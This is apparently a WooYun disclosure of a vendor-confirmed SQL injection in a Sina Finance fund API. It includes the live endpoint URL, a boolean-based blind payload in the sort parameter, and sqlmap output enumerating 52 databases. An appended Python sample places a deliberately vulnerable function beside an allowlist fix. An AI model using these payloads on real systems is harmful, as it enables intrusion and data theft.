Vulnerability summary (24 watchers)

Defect ID: wooyun-2015-0162049

Title: SQL injection in Sina Finance (part three)

Vendor: 新浪 (Sina)

Author: 小邪

Submitted: 2015-12-17 11:12

Fixed: 2016-01-28 17:10

Published: 2016-01-28 17:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-12-17: details sent to the vendor, awaiting vendor handling
2015-12-17: vendor confirmed; details visible to the vendor only
2015-12-27: details disclosed to core white hats and domain experts
2016-01-06: details disclosed to regular white hats
2016-01-16: details disclosed to intern white hats
2016-01-28: details disclosed to the public

Brief description:

52 databases are involved; a large amount of user data is affected.

Detailed description:

Injection point: http://vip.stock.finance.sina.com.cn/fund_center/api/jsonp.php/funds_yinhe/FundRank_Service.getYHFundInfo?page=1&num=6&sort=year3grade&asc=0&ccode=&type=01*&type3=&date=&%5Bobject%20HTMLDivElement%5D=o9kgo
The type parameter is injectable.

Proof of vulnerability:

Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: http://vip.stock.finance.sina.com.cn:80/fund_center/data/jsonp.php/funds_smsy/PEFundService.getHowBuyData?page=1&num=10&sort=(SELECT (CASE WHEN (6998=6998) THEN 6998 ELSE 6998*(SELECT 6998 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&asc=0&ccode=&date=&month=
---
[20:28:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[20:28:10] [INFO] fetching database names
[20:28:10] [INFO] fetching number of databases
[20:28:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:28:10] [INFO] retrieved: 52
[20:28:10] [INFO] retrieved: information_schema
[20:28:25] [INFO] retrieved: dealcollection
[20:28:34] [INFO] retrieved: finance_user_0
[20:28:42] [INFO] retrieved: finance_user_1
[20:28:49] [INFO] retrieved: finance_user_10
[20:28:57] [INFO] retrieved: finance_user_11
[20:29:05] [INFO] retrieved: finance_user_12
[20:29:12] [INFO] retrieved: finance_user_13
[20:29:25] [INFO] retrieved: finance_user_14
[20:29:33] [INFO] retrieved: finance_user_15
[20:29:43] [INFO] retrieved: finance_user_16
[20:29:51] [INFO] retrieved: finance_user_17
[20:30:05] [INFO] retrieved: finance_user_18
[20:30:12] [INFO] retrieved: finance_user_19
[20:30:21] [INFO] retrieved: finance_user_2
[20:30:28] [INFO] retrieved: finance_user_20
[20:30:38] [INFO] retrieved: finance_user_21
[20:30:47] [INFO] retrieved: finance_user_22
[20:30:57] [INFO] retrieved: finance_user_23
[20:31:07] [INFO] retrieved: finance_user_24
[20:31:17] [INFO] retrieved: finance_user_25
[20:31:24] [INFO] retrieved: finance_user_26
[20:31:32] [INFO] retrieved: finance_user_27
[20:31:39] [INFO] retrieved: finance_user_28
[20:31:47] [INFO] retrieved: finance_user_29
[20:31:55] [INFO] retrieved: finance_user_3
[20:32:07] [INFO] retrieved: finance_user_30
[20:32:15] [INFO] retrieved: finance_user_31
[20:32:23] [INFO] retrieved: finance_user_32
[20:32:33] [INFO] retrieved: finance_user_33
[20:32:41] [INFO] retrieved: finance_user_34
[20:32:51] [INFO] retrieved: finance_user_35
[20:33:00] [INFO] retrieved: finance_user_4
[20:33:09] [INFO] retrieved: finance_user_5
[20:33:18] [INFO] retrieved: finance_user_6
[20:33:29] [INFO] retrieved: finance_user_7
[20:33:36] [INFO] retrieved: finance_user_8
[20:33:45] [INFO] retrieved: finance_user_9
[20:33:53] [INFO] retrieved: hkstock
[20:33:57] [INFO] retrieved: moneyfinance
[20:34:03] [INFO] retrieved: mysql
[20:34:06] [INFO] retrieved: nagiosdmm
[20:34:11] [INFO] retrieved: performance_schema
[20:34:19] [INFO] retrieved: stp_user_0
[20:34:25] [INFO] retrieved: stp_user_1
[20:34:54] [INFO] retrieved: stp_user_2
[20:35:03] [INFO] retrieved: stp_user_3
[20:35:11] [INFO] retrieved: stp_user_4
[20:35:18] [INFO] retrieved: stp_user_5
[20:35:25] [INFO] retrieved: test
[20:35:27] [INFO] retrieved: xddmm
[20:35:31] [INFO] retrieved: zjmdmm
available databases [52]:
[*] dealcollection
[*] finance_user_0
[*] finance_user_1
[*] finance_user_10
[*] finance_user_11
[*] finance_user_12
[*] finance_user_13
[*] finance_user_14
[*] finance_user_15
[*] finance_user_16
[*] finance_user_17
[*] finance_user_18
[*] finance_user_19
[*] finance_user_2
[*] finance_user_20
[*] finance_user_21
[*] finance_user_22
[*] finance_user_23
[*] finance_user_24
[*] finance_user_25
[*] finance_user_26
[*] finance_user_27
[*] finance_user_28
[*] finance_user_29
[*] finance_user_3
[*] finance_user_30
[*] finance_user_31
[*] finance_user_32
[*] finance_user_33
[*] finance_user_34
[*] finance_user_35
[*] finance_user_4
[*] finance_user_5
[*] finance_user_6
[*] finance_user_7
[*] finance_user_8
[*] finance_user_9
[*] hkstock
[*] information_schema
[*] moneyfinance
[*] mysql
[*] nagiosdmm
[*] performance_schema
[*] stp_user_0
[*] stp_user_1
[*] stp_user_2
[*] stp_user_3
[*] stp_user_4
[*] stp_user_5
[*] test
[*] xddmm
[*] zjmdmm

Fix suggestion:

You know what to do.

Copyright notice: credit the source when reposting: 小邪@乌云
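The report leaves the fix unstated. As an added example (not from the report and not Sina's code), here is the pattern that produces this class of bug beside its hardened form: a ranking endpoint whose sort key is spliced into ORDER BY, where a bound parameter cannot be used and an allowlist is the correct control. The table and columns (fund_rank, ccode, year1grade, year3grade) are assumptions modelled on the URL parameters, and SQLite stands in for MySQL.

```python
import sqlite3

# Constructed sample rows standing in for the fund-ranking table
# (assumption: the real schema is not on the page).
FUNDS = [("000001", 12.5, 40.1), ("000002", 8.3, 55.0), ("000003", 15.9, 30.2)]


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE fund_rank (ccode TEXT, year1grade REAL, year3grade REAL)")
    conn.executemany("INSERT INTO fund_rank VALUES (?, ?, ?)", FUNDS)
    return conn


def rank_vulnerable(sort, asc, num):
    # Vulnerable pattern: the sort key goes into ORDER BY verbatim, so any SQL
    # expression, including a boolean-based blind CASE/subselect, is evaluated.
    direction = "ASC" if asc == "1" else "DESC"
    sql = f"SELECT ccode FROM fund_rank ORDER BY {sort} {direction} LIMIT {num}"
    return [r[0] for r in _db().execute(sql)]


# Allowlist: request value -> fixed column name. Only these may reach ORDER BY.
SORT_COLUMNS = {"year1grade": "year1grade", "year3grade": "year3grade"}


def rank_hardened(sort, asc, num):
    # Identifiers cannot be bound as parameters, so the user value is mapped to
    # a column name from the allowlist and anything else is rejected. Values
    # that can be bound (LIMIT) go through placeholders.
    column = SORT_COLUMNS.get(sort)
    if column is None:
        raise ValueError(f"unknown sort key: {sort!r}")
    if asc not in ("0", "1"):
        raise ValueError("asc must be 0 or 1")
    num = int(num)
    if not 1 <= num <= 100:
        raise ValueError("num out of range")
    direction = "ASC" if asc == "1" else "DESC"
    sql = f"SELECT ccode FROM fund_rank ORDER BY {column} {direction} LIMIT ?"
    return [r[0] for r in _db().execute(sql, (num,))]
```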


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2015-12-17 14:55

Vendor reply:

Thanks for the support.

Latest status:

None yet.


Comments:

  1. 2015-12-22 18:03 | 土夫子 ( Regular white hat | Rank: 453 Vulnerabilities: 80 | Where the road seems to end, a new path will open )

    Hand over the magic tool.